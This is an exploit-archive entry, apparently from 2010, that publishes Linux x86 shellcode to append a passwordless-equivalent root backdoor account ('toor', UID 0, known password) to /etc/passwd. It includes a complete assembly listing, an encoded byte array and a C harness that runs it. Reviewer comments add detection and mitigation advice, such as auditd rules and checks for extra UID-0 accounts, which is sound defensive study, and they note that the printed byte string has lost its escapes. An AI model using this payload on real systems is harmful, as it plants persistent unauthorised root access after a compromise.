[linux/x86] - linux/x86 setreuid(0) and add user with root
Posted on 27 September 2010
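#include <stdio.h>
#include <string.h>

/*
 * Title       : linux x86 shellcode setresuid(0, 0, 0) and add a user with
 *               root's privileges to /etc/passwd, 105 bytes
 * Author      : xertux
 * Platform    : Linux x86 (32-bit, int 0x80 ABI)
 * Source      : Inj3ct0r.com, 2010-09-27
 * Description : setresuid(0, 0, 0)
 *               + open("/etc//passwd", 0x441, 0x180)
 *               + write(fd, "toor:Gf.Dz3qr2izHU:0:0::/:/bin/sh\n", 34)
 *               + close(fd)
 *               Appends a user "toor" with password "toor" and UID/GID 0 to
 *               the end of /etc/passwd.
 * Size        : 105 bytes
 *
 * Review notes:
 *  - The original title says setreuid()/setuid(), but the listing loads
 *    syscall number 0xa4 (164), which on 32-bit x86 Linux is setresuid().
 *  - setresuid(0, 0, 0) only succeeds in a process that is already
 *    privileged (one of its real/effective/saved UIDs is 0, or it holds
 *    CAP_SETUID). The payload does not gain privilege by itself; it is what
 *    runs after code execution inside a root or setuid-root process.
 *  - No return value is checked. If setresuid() or open() fails, the later
 *    calls simply fail as well and /etc/passwd is left unchanged.
 *  - Nothing follows the final close(): there is no exit or return in the
 *    listing, so the host process presumably faults afterwards. A crash
 *    next to a passwd modification is a useful forensic correlation.
 *  - The 13-character password field matches the traditional DES crypt(3)
 *    format and is stored in /etc/passwd itself, not in /etc/shadow.
 *
 * Detection and mitigation:
 *  - Audit writes to the account databases, for example
 *    "-w /etc/passwd -p wa -k identity" in the auditd rules, and cover the
 *    file with integrity monitoring.
 *  - Alert on any account other than root with UID 0
 *    (awk -F: '$3 == 0' /etc/passwd) and on passwd entries whose second
 *    field holds a hash instead of "x" on systems using shadow passwords.
 *  - Minimise setuid-root binaries and root-owned network services; the
 *    payload is harmless in an unprivileged process.
 */

/*
BITS 32

; setresuid(0, 0, 0)
xor eax, eax            ; eax becomes 0
xor ebx, ebx            ; ebx becomes 0 (ruid)
xor ecx, ecx            ; ecx becomes 0 (euid)
cdq                     ; edx becomes 0 (suid)
mov al, 0xa4            ; syscall number 164 into eax
int 0x80                ; execute setresuid(0, 0, 0)

; open("/etc//passwd", 0x441, 0x180)
push edx                ; string NUL terminator
push 0x64777373         ; push "sswd"
push 0x61702f2f         ; push "//pa"
push 0x6374652f         ; push "/etc"
mov ebx, esp            ; ebx points to "/etc//passwd"
mov WORD cx, 0x441      ; flags: O_WRONLY | O_CREAT | O_APPEND
mov WORD dx, 0x180      ; mode 0600: S_IRUSR | S_IWUSR
push BYTE 0x5           ; syscall number of open on the stack
pop eax                 ; ... and into eax
int 0x80                ; execute open()

; write(fd, "toor:Gf.Dz3qr2izHU:0:0::/:/bin/sh\n", 34)  ==> password "toor"
mov ebx, eax            ; file descriptor returned by open into ebx
xor eax, eax            ; eax becomes 0
push eax                ; string NUL terminator
push WORD 0x0a68        ; push "h\n"
push 0x732f6e69         ; push "in/s"
push 0x622f3a2f         ; push "/:/b"
push 0x3a3a303a         ; push ":0::"
push 0x303a5548         ; push "HU:0"
push 0x7a693272         ; push "r2iz"
push 0x71337a44         ; push "Dz3q"
push 0x2e66473a         ; push ":Gf."
push 0x726f6f74         ; push "toor"
mov ecx, esp            ; ecx points to the passwd line (not ebx)
push BYTE 34            ; length of the line on the stack
pop edx                 ; ... and into edx
mov al, 0x4             ; syscall number of write into eax
int 0x80                ; execute write()

; close(fd)
push BYTE 0x6           ; syscall number of close on the stack
pop eax                 ; ... and into eax
int 0x80                ; execute close(fd); ebx still holds fd
*/

/*
 * Encoded form of the listing above.
 * NOTE(review): as printed on this page the literal contains no escape
 * sequences, so the array holds printable text rather than the instruction
 * bytes of the listing. It is reproduced here exactly as published.
 */
char shellcode[] =
    "x31xc0x31xdbx31xc9x99xb0xa4xcdx80x52x68x73x73x77"
    "x64x68x2fx2fx70x61x68x2fx65x74x63x89xe3x66xb9x41"
    "x04x66xbax80x01x6ax05x58xcdx80x89xc3x31xc0x50x66"
    "x68x68x0ax68x69x6ex2fx73x68x2fx3ax2fx62x68x3ax30"
    "x3ax3ax68x48x55x3ax30x68x72x32x69x7ax68x44x7ax33"
    "x71x68x3ax47x66x2ex68x74x6fx6fx72x89xe1x6ax22x5a"
    "xb0x04xcdx80x6ax06x58xcdx80";

/*
 * Test harness: prints the length of the array, then calls the array as if
 * it were a function.
 *
 * The call converts a data pointer to a function pointer, which ISO C does
 * not define. It also relies on the array's memory being executable; where
 * data pages are mapped non-executable (NX / W^X) the call faults instead
 * of running the bytes.
 */
int main(void)
{
    /* strlen() returns size_t, so the conversion must be %zu, not %d. */
    printf("[*] Shellcode - length: %zu ", strlen(shellcode));

    (*(void (*)())shellcode)();

    return 0;
}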